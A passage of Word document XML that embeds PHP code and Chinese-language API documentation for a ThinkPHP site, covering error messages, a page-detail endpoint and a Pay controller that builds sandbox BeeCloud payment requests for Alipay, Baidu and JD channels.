      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A004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'302' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码错误或用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDBE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'303' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43044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'304' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号码已被注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2F0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'305' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱已被注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42E9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'306' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号码没有对应的绑定用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711709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'500' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请重新尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC68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'501' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库操作失败，请重新尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D3BF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'502' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请勿重复操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E4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716C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C5812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9CC2C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68D9A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app\api\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005BF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app\api\model\Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EA5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3675A9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5AEE8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Page extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA71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1687C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2072AF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AC5EF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468C3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2785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27F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/api/page/view </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46740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单页详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7053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单页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F3B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3F8F1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5C94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id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB9C8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56F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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48475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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D827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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2375A0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body  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页内容（富文本内容）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A9E3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99F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function view()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D3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8D9B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2295E0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Db::name('page')-&gt;cache(true)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC796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05DE70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8804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A1B05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199F70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app\api\controller\Common;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0C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think\Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760B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think\Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398F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think\Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E67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53B04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Pay extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF2D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8D86F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$member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C4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2589F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$config=Db::name('member_config')-&gt;where('name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38945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2D880C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 || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575F2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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6F8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371A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$token=Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51105E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BBF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json_encode(['err'=&gt;'token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA9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60B18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C27B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$uid=_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0BF5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17D7BD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87CF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7390E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FF6E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$member=$member=Db::name('member')-&gt;where('id',$uid)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C335F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39F34F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switch ($member['hide']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F6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23306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136275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434A5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无法登录，原因是账户已被封号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171ADB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5A5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30333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77AE8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014714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1EE89B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5C9323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13B41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账户正在审核，请等待客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00377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2D41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4230A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0598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65F51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06D2C0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操作，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26B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0DFC0D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账户审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19967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2ED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4A0C24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ED889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642153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8CD2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E82CD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会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B208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9C586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B5D0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$this-&gt;member=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F082A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42F9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1F57C7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_ajaxError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05868F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484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payList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F068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$type=input('post.type') ? input('post.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FCF6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6E8C17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'type'=&gt;'require|in:pc,app,wap,wx',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7543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AA94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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D3C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'type'=&gt;$type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D683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76A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6092F2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json(['err'=&gt;$validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D5D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B865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$where['type']=$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0319A4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$where['hide']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D359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$data=Db::name('pay')-&gt;where($where)-&gt;cache(_cache('db'))-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C103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664740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670C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request_post($url = '', $param = '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A8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(empty($url) || empty($param)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA997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642397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8188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$postUrl = $url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F6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$curlPost = $param;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD13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 = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5861DE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CURLOPT_URL,$postUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D989F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CURLOPT_HEADER, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FF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CURLOPT_RETURNTRANSFER, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01994D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CURLOPT_POST, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714778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curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE63B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curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64907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curl_close($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D01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F3D02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8BC4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pay(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FF3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require_once(VENDOR_PATH.'/beecloud/loader.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F593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require_once(VENDOR_PATH.'/beecloud/demo/config.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A06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161F11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$api-&gt;registerApp(APP_ID, APP_SECRET, MASTER_SECRET, TEST_SECRET);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F36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$api-&gt;setSandbox(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544444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}catch(Exception $e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1271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die($e-&gt;getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10919E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869D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$sctype=input("sctype/d") ? input("sctype/d") : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061A9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$scookies=input("scookies") ? input("scookies") : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F4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if($sctype==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339A5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$money=input("money/d") ? input("money/d") : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25845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2149F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2667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$type=input('type/d') ? input("type/d") : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F5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$titleid=input('titleid/d') ? input("titleid/d") : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7B3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$titleids=[1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>充值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消费</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',3=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>购买</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25973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61414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'require|number|max:9',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5657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'require|number|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A55F4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'titleid'       =&gt;      'require|between:1,3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1D6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'sctype'        =&gt;      'between:0,3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC50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5E6B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6142A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BB6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4633B8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'titleid'       =&gt;      $titleid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C9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'sctype'        =&gt;      $sctype,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9DFF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5856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32FF81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['err'=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17FB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218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$typetitle=Db::name('pay')-&gt;where('id',$type)-&gt;cache(_cache('db'))-&gt;value('type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F86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$bill_no=strtoupper($typetitle).date('YmdHis').rand(100000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5817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$data["timestamp"] = time() * 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C2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$data["total_fee"] = $money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3934F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$data["bill_no"] = $bill_no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC71E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$titleids[$titleid];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3A5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$data["return_url"] = "https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22100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$data["optional"] = (object)array("tag"=&gt;"msgtoreturn");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD7A5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$type=Db::name('pay')-&gt;where('id',$type)-&gt;cache(_cache('db'))-&gt;value('qudao');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F564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7C2576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['err'=&gt;'type</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44514A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A405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switch($type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18612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'ALI_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E07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支付宝及时到账</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F0F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"ALI_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907F3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12376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'ALI_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B80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支付宝移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC3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"ALI_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18729D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0101C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'ALI_QRCODE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05188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支付宝扫码支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E64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"ALI_QRCODE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AED0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$data["qr_pay_mode"] = "0";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8980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506E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'ALI_OFFLINE_QRCODE' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B791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"ALI_OFFLINE_QRCODE";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155A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支付宝线下扫码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA4ED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VENDOR_PATH.'/beecloud/ali/index.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28286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07A0F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5ADC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'BD_WEB' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A09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"BD_WEB";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDC8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百度网页支付</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98CD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0238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'BD_WAP' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C6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"BD_WAP";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325D0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百度移动网页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9E9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920F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'JD_B2B' :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095F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"JD_B2B";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640400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935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bank_code(int </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) for channel JD_B2B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5F1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9102    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国工商银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      9107    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>招商银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059A13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9103    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中国农业银行</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      9108    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>光大银行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EE83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9104    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
